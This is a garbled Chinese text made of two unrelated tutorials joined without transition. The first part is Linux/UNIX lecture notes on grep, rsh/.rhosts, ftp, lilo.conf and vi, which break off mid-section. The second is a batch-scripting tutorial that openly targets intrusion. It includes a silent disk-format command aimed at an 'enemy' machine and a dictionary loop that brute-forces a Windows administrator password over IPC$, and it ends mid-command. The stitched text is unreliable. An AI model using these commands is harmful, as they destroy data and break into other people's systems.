可将欲过滤的一群字串放在某一个档案中,然後使用 fgrep 将包含有属於这 一群字串的行过滤出来。 grep 与 fgrep 的用法如下: grep [-nv] match_pattern file1 file2 .... fgrep [-nv] -f pattern_file file1 file2 ... -n 把所找到的行在行前加上行号列出 -v 把不包含 match_pattern 的行列出 match_pattern 所要搜寻的字串 -f 以 pattern_file 存放所要搜寻的字串 七. 网路上查询状况的指令 1. man 17man 是手册 ( manual ) 的意思。 UNIX 提供线上辅助( on-line help )的功能, man 就 是用来让使用者在使用时查询指令、系统呼叫、标准程式库函式、各种表格等的使用所用 的。man 的用法如下: man [-M path] [[section] title ] ..... man [-M path] -k keyword ... -M path man 所需要的 manual database 的路径。 我们也可以用设定环境变数 MANPATH 的方式来取代 -M 选项。 title 这是所要查询的目的物。 section 为一个数字表示 manual 的分类,通常 1 代表可执行指令,2 代表系统呼叫 ( system call ) ,3 代表标准函数,等等。 我们如要参考 eqnchar(7) 的资料,则我们就输入 man 7 eqnchar ,便能取得我们所要 的辅助讯息。 -k keyword 用来将含有这项 keyword 的 title 列出来。 man 在 UNIX 上是一项非常重要的指令,我们在本讲义中所述之用法均仅只是一个大家 比较常用的用法以及简单的说明,真正详细的用法与说明还是要请你使用 man 来得到。 2. who who 指令是用来查询目前有那些人在线上。 3. w w 指令是用来查询目前有那些人在线上,同时显示出那些人目前的工作。 4. ku ku 可以用来搜寻整个网路上的 user , 不像 w 跟 who 只是针对 local host 的查询. 而且 ku 提供让使用者建立搜寻特定使用者名单的功能。你可以建立一个档案 information-file 以条列的方式存放你的朋友的资料,再建立一个档案 hosts-file 来指 定搜寻的机器名称。 ku 的指令格式可由 ku -h 得到。 八. 网路指令 UNIX 提供网路的连接,使得你可以在各个不同的机器上做一些特殊的事情,如你可以 在系上的 iris 图形工作站上做图形的处理,在系上的 Sun 上读 News ,甚至到学校的计 中去找别系的同学 talk 。这些工作可以利用 UNIX 的网路指令,在你的位子上连到各个 不同的机器上工作。如此一来,即使你在寝室,也能轻易的连至系上或计中来工作,不用 像以前的人必须泡在冷冰冰的机房面。 这些网路的指令如下所述: 181. rlogin 与 rsh rlogin 的意义是 remote login , 也就是经由网路到另外一部机器 login 。 rlogin 的格式是: rlogin host [ -l username ] 选项 -l username 是当你在远方的机器上的 username 和 local host 不同的时後, 必须输入的选项,否则 rlogin 将会假设你在那边的 username 与 localhost 相同,然後 在第一次 login 时必然会发生错误。 rsh 是在远方的机器上执行某些指令,而把结果传回 local host 。rsh 的格式如下: rsh host [ -l username ] [ command ] 如同 rlogin 的参数 -l username , rsh 的 -l username 也是指定 remote host 的 username 。而 command 则是要在 remote host 上执行的指令。如果没有 指定 command , 则 rsh 会去执行 rlogin ,如同直接执行 rlogin 。 不过 rsh 在执行的时候并不会像一般的 login 程序一样还会问你 password , 而是 如果你没有设定 trust table , 则 remote host 将不会接受你的 request 。 rsh 须要在每个可能会做为 remote host 的机器上设定一个档案,称为 .rhosts。这 个档案每一行分为两个部份,第一个是允许 login 的 hostname , 第二个部份则是允许 login 的username 。 例如, 在 ccsun7.csie.nctu.edu.tw 上头你的 username 为 QiangGe , 而你的 home 下面的 .rhost 有以下的一行: ccsun6.cc.nctu.edu.tw u8217529 则在 ccsun6.cc.nctu.edu.tw 机器上的 user u8217529 就可以用以下的方法来执行 rsh 程式: % rsh ccsun7.csie.nctu.edu.tw -l ysjuang cat mbox 将 ysjuang 在 ccsun7.csie.nctu.edu.tw 上的 mbox 档案内容显示在 local host ccsun6.cc.nctu.edu.tw 上。 而如果 .rhost 有这样的一行,则 ccsun6.cc.nctu.edu.tw 上的 user u8217529 将可以不用输入 password 而直接经由 rsh 或 rlogin login 到 ccsun7.csie.nctu.edu.tw 来。 注意: .rhost 是一个设定可以信任的人 login 的表格,因此如果设定不当将会让不法之徒 有可以乘机侵入系统的机会。 如果你阅读 man 5 rhosts ,将会发现你可以在第一栏用 + 来取代任何 hostname ,第二栏用 + 来取代任何 username 。 如一般 user 喜欢偷懒利用 " + username " 来代替列一长串 hostname ,但是这样 将会使得即使有一台 PC 上跑 UNIX 的 user 有与你相同的 username , 也可以得到你的 trust 而侵入你的系统。这样容易造成系统安全上的危险。因此本系禁止使用这样子的方 19式写你的 .rhost 档,如果发现将予以停机直到你找中心的工作人员将其改正为止。 同理, 如果你的第二个栏位为 + , 如"hostname + " ,则你是允许在某一部机器上的"所有"user 可 以不用经由输入 password 来进入你的帐号,是壹种更危险的行为。所以请自行小心。 2. telnet telnet 是一个提供 user 经由网路连到 remote host。 telnet 的格式如下: telnet [ hostname | ip-address ] [ port ] hostname 为一个像 ccsun1 或是 ccsun1.cc.nctu.edu.tw 的 nameaddress, ip-address 则为一个由四个小於 255 的数字组成的 ip address ,如 ccsun1 的 ip-address 为 140.113.17.173 ccsun1.cc.nctu.edu.tw 的 ip-address 为 140.113.4.11 。你可以利用 telnet ccsun1 或telnet 140.113.17.173 来连到 ccsun1。 port 为一些特殊的程式所提供给外界的沟通点, 如资工系的 MUD 其 server 便提 供一些 port 让 user 由这些 port 进入 MUD 程式。详情请参阅 telnet(1)的说明。 3. ftp ftp 的意义是 File Transfer Program ,是一个很常应用在网路档案传输的程式。ftp 的格式如下: ftp [ hostname | ip-address ] 其中 hostname | ip-address 的意义跟 telnet 中的相同。 在进入 ftp 之後,如果与 remote host 连接上了,它将会询问你 username 与密码, 如果输入对了就可以开始进行档案传输。 在 ftp 中有许多的命令,详细的使用方式请参考 ftp(1) ,这里仅列出较常用的 cd , lcd , mkdir , put , mput , get , mget , binary , ascii , prompt , help 与 quit 的 使用方式。 ascii 将传输模式设为 ascii 模式。通常用於传送文字档。 binary 将传输模式设为 binary 模式,通常用於传送执行档,压缩档与影像档等。 cd remote-directory 将 remote host 上的工作目录改变。 lcd [ directory ] 更改 local host 的工作目录。 ls [ remote-directory ] [ local-file ] 列出 remote host 上的档案。 get remote-file [ local-file ] 取得远方的档案。 mget remote-files 可使用通用字元一次取得多个档案。 put local-file [ remote-file] 将 local host 的档案送到 remote host。 mput local-files 可使用通用字元一次将多个档案放到 remote host 上。 help [ command ] 线上辅助指令。 20mkdir directory-name 在 remote host 造一个目录。 prompt 更改交谈模式,若为 on 则在 mput 与 mget 时每作一个档案之传输时均会询 问。 quit/bye 离开ftp . 利用 ftp ,我们便可以在不同的机器上将所需要的资料做转移,某些特别的机器更存 放大量的资料以供各地的使用者抓取,本校较著名的 ftp server 有 NCTUCCCA 与系上的 ftp.csie.nctu.edu.tw 。这些 ftp server 均有提供一个 user 称为 anonymous ,一般 的"外来客"可以利用这个 username取得该 server 的公共资料。不过 anonymous 在询问 password 时是要求使用 anonymous 的使用者输入其 email address,以往有许多台湾的使 用者在使用国外的 ftp server 时并没有按照人家的要求输入其 email address,而仅是随 便打一些字串,引起许多 internet user 和管理者的不满,对台湾的使用者的风评变得很 差,因此遵循各 ftp server 的使用规则也是一件相当重要的事。 九. 关於通讯用的指令 1. write 这个指令是提供使用者传送讯息给另一个使用者,使用方式: write username [tty] 2. talk/ytalk/cytalk/ctalk UNIX 专用的交谈程式。会将萤幕分隔开为你的区域和交谈对象的区域,同时也可和不 同机器的使用者交谈。使用方式: talk username[@host] [tty] 3. mesg 选择是否接受他人的 messege , 若为 messege no 则他人的 messege 将无法传送给 你,同时他也无法干扰你的工作。使用方法: mesg [-n|-y] 4. mail/elm 在网路上的 email 程式,可经由此程式将信件 mail 给他人。 使用方式: mail [username] mail -f mailboxfile 如有信件,则直接键入 mail 可以读取你的 mail . elm 提供较 mail 更为方便的介面,而且可做线上的 alias . 你可以进入 elm 使用上下 左右键来选读取的信件,并可按 h 取得线上的 help 文件。 21使用方式: elm [usernmae] elm -f mailboxfile 十. 编译器( Compiler ) Compiler 的用处在於将你所撰写的程式翻译成一个可执行档案。在资工系常用的程式语 言是 C , pascal , FORTRAN 等。你可以先写好一个 C 或 Pascal 或 FORTRAN 的原始程 式档,再用这些 compiler 将其翻成可执行档。你可以用这个方法来制造你自己的特殊指 令。 1. cc/gcc (C Compiler) /usr/bin/cc /usr/local/bin/gcc 语法: cc [ -o execfile ] source gcc [ -o execfile ] source execfile 是你所希望的执行档的名称,如果没有加上 -o 选项编译出来的可执行档会以 a.out 做为档名。 source 为一个以 .c 做为结尾的 C 程式档。请参阅 cc(1) 的说明。 2. pc (Pascal Compiler) /usr/local/bin/pc 语法: pc [ -o execfile ] source execfile 是你所希望的执行档的名称,如果没有加上 -o 选项编译出来的可执行档会 以 a.out 做为档名。 source 为一个以 .p 做为结尾的 Pascal 程式档。 请参阅 /net/home5/lang/man 中 pc(1) 的说明。 3. f77 (Fortran Compiler) /net/home5/lang/f77 语法: f77 [ -o execfile ] source execfile 是你所希望的执行档的名称,如果没有加上 -o 选项编译出来的可执行档会以 a.out 做为档名。 source 为一个以 .p 做为结尾的 FORTRAN 程式档。 十一. 有关列印的指令 以下为印表所会用到的指令,在本系的印表机有 lp1 , lp2 ( 点矩阵印表机 ), lw , sp , ps , compaq ( 雷射印表机 ),供使用者使用。 221. lpr lpr 为用来将一个档案印至列表机的指令。用法: lpr -P[ printer ] file1 file2 file3 ... 或 lpr -P[ printer ] < file1 例子: lpr -Plp1 hello.c hello.lst hello.map lpr -Plp1 < hello.c 前者以参数输入所要印出的档案内容,後者列印标准输入档案(standard input)的内 容,因已将 hello.c 转向到标准输入,故会印出 hello.c 的档案内容。 2. lpq lpq 是用来观察 printer queue 上的 Jobs 。用法: lpq -P[ printer ] 3. lprm lprm 是用来取消列印要求的指令。 通常我们有时会印错,或是误送非文字档资料至 printer , 此时就必须利用 lprm 取消列印 request ,以免造成资源的浪费。 用法: lprm -P[ printer ] [ Jobs id | username ] lprm 用来清除 printer queue 中的 Jobs , 如果你使用 Job Id 作为参数,则它将此 Job 自 printer queue 清除,如果你用 username 作为参数,则它将此 queue 中所有 Owner 为此 username 的 Jobs 清除。 到这里,我们第二讲的内容就基本结束了,可以说,这一讲是比较无聊的,但它又是 必不可少的。这里列出的仅仅是最最常用的控制台命令,要进一步的熟悉 Linux操作系统, 了解类 UNIX 操作系统的管理思想,我们还有很多要学习,有兴趣的同学可以参看其它的 相关参考书籍。 23 第三讲 Linux下的网络服务,配置问题和 常用工具 这一讲我们会接触到 Linux 下能够提供的一些典型的网络服务,大家会对这些服务有 一个感的认识,除此之外我们还会看到 Linux下面一些非常重要的配置文件以及他们的用 法。最后我们会看到 Linux 下面最常用的几个工具软件。 一.Linux下的网络服务 一般来说,各种操作系统在网络方面的能比较是这样的顺序 BSD>Linux>Win NT>Win 9X, 由此说来,Linux 的网络功能仅次于 UNIX,而强于 Win NT 和其它的视窗系 列产品,对于 Win2000我还不能评价太多,因为不是很熟。 Linux 的网络功能除了基本的连线功能如 telnet, ftp, rsh, login, finger等等以外,架设各 种服务器的功能更把 Linux 网络功能发挥的淋漓尽致,下面我大概的为大家介绍一下 Linux 下的各种网络服务。 1. Mail Server Email 现在是网络上最重要的服务了,你可能没有用过 FTP, BBS, INN,但是如果你连电 子邮件都没有用过,那作为 BUPT 的一员,你得自己好好反省一下了。 现在又很多功能强大的 mailserver供你选择,例如 freemail.263.net, hotmail.com, freemail.sohu.com,等等,这些都是免费的。但这是从使用者角度来看,如果你是想为一个局 域网内部提供一个交换电子邮件的服务,那它们对你来说可就是一笔巨款了,再说人家卖 不卖给你还不好说呢。Linux 下面最著名的 mail server是 Sendmail,它是一个负责监控和传 送电子邮件的邮件代理程序,你使用它就可以在在一个小的局域网(例如宿舍网)里提供 一个电子邮件服务,这是多么神奇的事情啊!使用 Linux 下面的 MailServer最大的好处是 价比高,这些软件的功能强大,却又是完全免费的,我们完全不用去花几万元买一个功能 有限还要按照人头收费的 Exchange Server,或者是使用 D版软件被别人扎脊梁骨。 2. Router 和 Gateway 如果你的计算机可以连接到外面的 Internet 上去, 然而一些可以连接到你这台机器上的 24计算机却只能访问里面的局域网,那么你可以安装 Router或 Gateway的服务,这样别人就 可以通过你的机器和外面的世界联系了。当然了,这么做的前提是你有一颗大公无私的信, 要我就不行,我可舍不得把我的 PIII 的机器贡献给宿舍的网虫们。 3. Samba 在 Windows 横行的今天,Samba 的出现对于 Linux 的茁壮成长是非常重要的,它大大 拓宽了 Linux 的应用领域。Samba 可以提供一种转换 SMB(windows 使用的一种信息格式) 和 NFS(Linux 使用的一种信息格式)的服务,通过 Samba, 运行 Windows的工作站就可以 同运行 Linux 的服务器之间进行通信,还可以 让网络上的使用者(包括 Windows 用户)共 享一台打印机,这样 Linux 的服务器就可以运行在 Windows的环境中了。 4. NFS Server Linux 还可以作为文件服务器,为网络上具有存取权限的 Windows/Linux机器分享相同 的文件系统,这样一来,不论是在 Windows 还是在 Linux 的网络中,Linux 的文件服务器都 能够发挥作用了。 5. Terminal Server 这种服务能够提供 PPP/SLIP Dialup(包括 multi-port,就是一台计算机连多个调制解调器 上网),让一般的民用网络 Moden 使用者可通过 Terminal Server与 Internet连接起来。 6. BBS 在北邮如果你没有上过 BBS(Bulletin Board System电子布告版)我会很吃惊的, 202.112.101.44 或者是202.204.7.235 你至少应该去过一个吧?如果没有去过,那么赶快把这 一课补上。关于 BBS到底能做什么我就不多说了,我假定你已经知道了,现在网络上流行 的免费 BBS版本很多,著名的有 Phoenix,Maple,Firebird,Pivot等等,这些都可以在 Linux 上 使用。另外还有许多基于 WWW 的 BBS,例如著名的跨平台的 Motiff Community,可以非 常稳定的在 Linux 下运行,这是"瘟都死"所不能比拟的。 7. WWW 在 Linux下面也有功能强大的 WWW服务器,你完全可以不必去使用又贵又不稳定的 IIS。但是不可否认 IIS 的操作非常的简单,如果你觉得自己有钱,可以买得起 Win2000 Advanced Server,又出得起"人头税",那你就用"瘟都死"吧。在 Linux 上的 WWW服务程序 很多,现在最著名最流行的是 Apache,在北邮,有许多的服务器就是跑 Apache 的。现在在 Linux 上使用 Apache+PHP+MySQL 是实现动态页面的最佳搭配,立志于搞网站建设的朋友 可一定要留心这一块,因为它可以为你的网站建设节省大笔的成本(现在可是操作系统比 机器贵)。我知道一个讨论组:www.coventive.com.cn/club/default.htm,它就是用 Apache+PHP+MySQL 这种组合建立起来的,有兴趣的朋友可以去看看。 25 二.几种重要的配置文件 Linux 下面的配置文件非常的多,对于初学者来说,我们只需要知道最最常用的几个配 置文件就可以了。由于片符合时间的原因,在这里我只介绍四个非常经典的配置文件 (lilo.conf, passwd,inittab,fasttab),这四个文件中我重点介绍 lilo.conf,其余三个文件会简单的 在课堂上演示。至于 Linux 其它众多的配置文件必须各位同学自己下去查找相关资料自己学 习了。 1. lilo.conf 这是 Linuxloader(lilo)的配置文件。对于初学者来说,这个配置文件是非常重要的,因 为它直接关系到你的系统是否能够正确的引导到 Linux 上来。 我在这里主要将一下如何使用 lilo 实现多个在一台机器上安装多个操作系统。 一般来说,第一次安装 Linux 后,缺省引导的系统是 Linux,但是对大多数 Linux 用户 来说,他们使用 windows 的时间会多于 Linux,所以我们最好能够将缺省引导的系统改为 windows,这样的话,就省去了每次启动时敲一串字符的麻烦。要修改引导顺序,就要修改 Linux 系统中的一个配置文件,这个文件就是/etc/lilo.conf。我使用的是 Xlinux OS 1.5,用 vi 打开这个文件后,会出现下面的文字: boot=/dev/hda map=/boot/map install=/boot/boot.b prompt timeout=100 linear default=xlinux image=/boot/vmlinuz-2.2.14-5.0 read-only root=/dev/hda4 other=/dev/hda1 label=win 这就是刚刚安装完毕后的 LILO配制文件.这个文件是按照由前到后顺序引用的,通过修 改这个文件就可以改变 lilo 执行时的一些特.首先我将这个文件中比较重要的几个地方给 大家介绍一下: 首先请看第 5 行:timeout=100,这是一个设置在 lilo 引导缺省的系统之前等候用户输入系 统别名的等候时间长度.它的时长好象不是按秒一级的数量级进行计算的,总之用户可以按 照自己的实际需要设置相应的时长.我一般是设置成 timeout=500. 然后我们看第 7 行:default=xlinux,这里是关键之一!这一行指明缺省引导的系统的别名 26是 xlinux,要想改变系统的缺省引导顺序,这里是需要修改的,稍后就会说到是怎么修改的. 再看第8行到第 11 行,这四行指明了引导 Linux 系统的一些细节. image=/boot/vmlinuz-2.2.14-5.0指明了操作系统核心是放在哪里的,以便于引导程序装载操作 系统核心;label=xlinux指明了引导这个操作系统时用的别名,这里是xlinux; root=/dev/hda4指 明了引导程序需要到哪一个硬盘的第几个分区去寻找 init 过程,在这里是要到第一个硬盘的 第四个分区中去将引导系统的控制权交给这个分区里的 init过程. 最后我们看看文件中的最后两行.other=/dev/hda1说明除了linux操作系统以外,机器中还 安装了别的操作系统(当然我知道这个另外的操作系统是我的 win2000了),它位于第一块硬 盘中的第一个分区,一般来说,这个路径是在安装的时候就设置好的,不需要我们手工修改,但 是我认为知道这些信息还是很有必要的;label=win指明了这个系统引导时使用的别名为win. 因为 lilo 是顺序引用的,所以如果我们想要让缺省引导的系统变成 windows,就需要将这两行 移动到 image=.....那一行之前的位置,我建议的位置是放在 image=...之前和default=.....之后. 这是关键之二! 当你将前面的两个关键步骤完成之后,还需要将default=....那一行改成 default=win,这是 比较重要的一步,虽然即使你不改动这里,系统也可以按照你的想法去引导,但是我可不敢保 证你这样做不会出一点问题.再说,如果你不改动这里那多别扭啊! 做到这里,我们对lilo.conf这个文件的改动就结束了,然后只要退出vi,然后键入 lilo -v -v -v这个命令来更新一下LILO,我们就大功告成了.当你reboot以后,就会发现在"lilo:"那里敲入 回车键后,系统就会缺省的引导到 windows 系统去了. 2. Passwd 这个配置文件是关于用户口令的。如果你是一名系统管理员,有可能会一次新增很多 的用户,这时用 adduser就相当麻烦了。一般有功力的管理员会直接去修改/etc/passwd 文件。 利用 passwd文件,可以控制用户的口令状态及一些个人配置。 对于这个文件,普通单机用户使用的并不是很多,主要是多用户的管理员使用,对于 它的一些基本配置方法,我会在课堂上为同学们演示,这里不再赘述。 3. Inittab和 fasttab 这两个文件都是存放在/etc 这个目录下面的,Inittab 文件用来配置 Linux 初始化的一些 动作,我们最常用的是设定 Linux 的启动方式。Fasttab 文件用来设定一些在 Linux 启动时的 动作,主要是文件系统或者是外设的挂接动作,如果你想让你的 Linux 一开始就能够使用光 盘驱动器,就可以把 mount 指令加到这个文件中去。 因为这两个文件对我们初学者来说,可以利用的地方不是很多,所以我不用过多的文 字来描述它们的功能,具体的操作我会在课堂上为同学们演示,这里不再赘述。 27 三.Linux下常用的工具软件 这里我会为大家介绍 Linux 世界里最常用的几种工具软件,包括:vi, tar, gzip, rpm。 1. 文字编辑 vi 是Linux(UNIX)世界最强大的文本编辑工具,我在第一讲中提到过它,现在我把它的 一些基本使用方法介绍给大家。 Vi 的三种状态 „ Command mode : 控制萤幕游标之移动,字元或游标之删除,搬移复制某 区段及进入 Insert mode 下,或者到 Last line mode 。 „ Insert mode : 唯有在 Insert mode 下, 才可做文字资料输入,按 Esc 键可到 Command mode 。 „ Last line mode : 将档案写入或离开编辑器,亦可设定编辑环境, 如寻找字 串、列出行号..等。 vi 的基本操作 ‹ 进入 vi 1. 在系统提示符号下输入 vi 及档案名称後即进入 vi 全萤幕编辑画面,且在 Command mode 下。 ‹ 切换至 Insert mode 编辑文件: 在 Command mode 下可按 'i' 或 'a' 或 'o' 三键进入 Insert mode。 ‹ 离开 vi 及存档: 在 Command mode 下可按 ':' 键进入 Last line mode, :w filename (存入指定档案) :wq (写入并离开 vi) :q! (离开并放弃编辑的档案) Command mode 下功能键简介 1. 进入 Insert mode i : 插入, 从目前游标所在之处插入所输入之文字。 a : 增加, 目前游标所在之下一个字开始输入文字。 o : 从新的一行行首开始输入文字。 2. 移动游标
简明批处理教程22009年10月20日 星期二 下午 05:35 最近对于批处理技术的探讨比较热,也有不少好的批处理程序发布,但是如果没有一定的相关知识恐怕不容易看懂和理解这些批处理文件,也就更谈不上自己动手编写了,古语云:“授人以鱼,不如授人以渔。”因为网上好像并没有一个比较完整的教材,所以抽一点时间写了这片《简明批处理教程》给新手朋友们.也献给所有为实现网络的自由与共享而努力的朋友们. 批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。 一、简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on|off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。) 3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label(label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 Rem Message Sample:@Rem Here is the description. 5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。 6.Call 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。 语法 call [Drive:][Path] FileName [BatchParameters] [:label [arguments] 参数 [Drive:}[Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 7.start 命令 调用外部程序,所有的DOS命令命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: Sample.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag(应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:dosdefrag goto end :mem mem goto end :end echo good bye 此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。 9.If 命令 if 表示将判断是否符合规定的条件,从而决定执行不同的命令。有三种格式: 1、if "参数" == "字符串" 待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms 2、if exist 文件名 待执行的命令 如果有指定的文件,则条件成立,运行命令,否则运行下一句。 如if exist config.sys edit config.sys 3、if errorlevel / if not errorlevel 数字 待执行的命令 如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 如if errorlevel 2 goto x2 DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。 10.for 命令 for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable for {%variable|%%variable} in (set) do command [ CommandLineOptions] %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I 如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 支持: FOR /D %variable IN (set) DO command [command-parameters] 如果集中包含通配符,则指定与目录名匹配,而不与文件 名匹配。 FOR /R [drive:]path] %variable IN (set) DO command [command- 检查以 [drive:]path 为根的目录树,指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录,则使用当前 目录。如果集仅为一个单点(.)字符,则枚举该目录树。 FOR /L %variable IN (start,step,end) DO command [command-para 该集表示以增量形式从开始到结束的一个数字序列。 因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 序列 (5 4 3 2 1)。 FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command 或者,如果有 usebackq 选项: FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前,每份文件都已被打开、读取并经过处理。 处理包括读取文件,将其分成一行行的文字,然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为: eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。 sample1: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 取得第二个符号,引用 %j 来取得第三个符号,引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名,您需要用双引号将文件名括起来。为了用这种方式来使 用双引号,您还需要使用 usebackq 选项,否则,双引号会 被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明,%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或 'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 用单引号将括号之间的 filenameset 括起来。这样,该字符 串会被当作一个文件中的一个单一输入行。 最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 内存,并被当作文件分析。因此,以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 另外,FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法: ~I - 删除任何引号("),扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义,或者没有找到文件,此组合键会扩充 空字符串 可以组合修饰符来得到多重结果: %~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读,而且避免与不分大小写的组合键混淆。 以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。 sample2: 利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \ipipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for /f i% in (dict.txt) do net use \ipipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- for /f i%% in (dict.txt) do net use \ipipc$ "i%%" /u:"administrator"|find 